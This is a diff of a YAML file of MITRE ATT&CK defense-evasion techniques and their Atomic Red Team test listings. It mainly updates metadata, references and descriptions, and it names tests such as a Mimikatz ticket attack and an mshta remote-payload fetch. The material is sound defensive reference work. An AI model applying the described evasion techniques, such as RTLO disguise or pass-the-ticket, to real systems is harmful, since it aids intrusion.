       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -16648,7 +16768,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -16683,8 +16803,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -16775,7 +16893,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests:
     - name: Auditing Configuration Changes on Linux Host
@@ -17001,7 +17118,7 @@ defense-evasion:
         elevation_required: true
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -17009,19 +17126,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -17030,7 +17153,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -17053,9 +17176,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -17088,7 +17210,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -17107,8 +17229,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -17139,7 +17259,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -17169,12 +17289,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -17200,9 +17318,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -17233,9 +17350,8 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests:
     - name: Indicator Removal using FSUtil
@@ -17282,7 +17398,7 @@ defense-evasion:
         elevation_required: false
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -17302,6 +17418,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -17309,7 +17426,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -17325,34 +17441,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests:
     - name: Mimikatz Kerberos Ticket Attack
@@ -17519,7 +17636,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests:
     - name: Creating W32Time similar named service using schtasks
@@ -17640,7 +17756,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -17689,8 +17805,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests:
     - name: Process Injection via C#
@@ -17828,7 +17942,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -17849,7 +17963,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests:
     - name: Plist Modification
@@ -17935,7 +18048,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests:
     - name: Mount ISO image
@@ -18099,7 +18211,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -18120,8 +18232,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -18182,11 +18292,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -18251,7 +18360,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests:
     - name: Build Image On Host
@@ -18312,7 +18420,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -18356,8 +18464,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests:
     - name: Portable Executable Injection
@@ -18447,7 +18553,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -18471,7 +18577,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -18562,7 +18667,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests:
     - name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
@@ -18675,35 +18779,7 @@ defense-evasion:
           default: Invoke-Mimikatz
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -18715,6 +18791,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -18725,8 +18805,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -18736,9 +18822,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -18791,7 +18896,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -18829,8 +18934,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests:
     - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
@@ -19107,62 +19210,68 @@ defense-evasion:
         name: command_prompt
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -19220,7 +19329,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests:
     - name: Named pipe client impersonation
@@ -19385,7 +19493,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
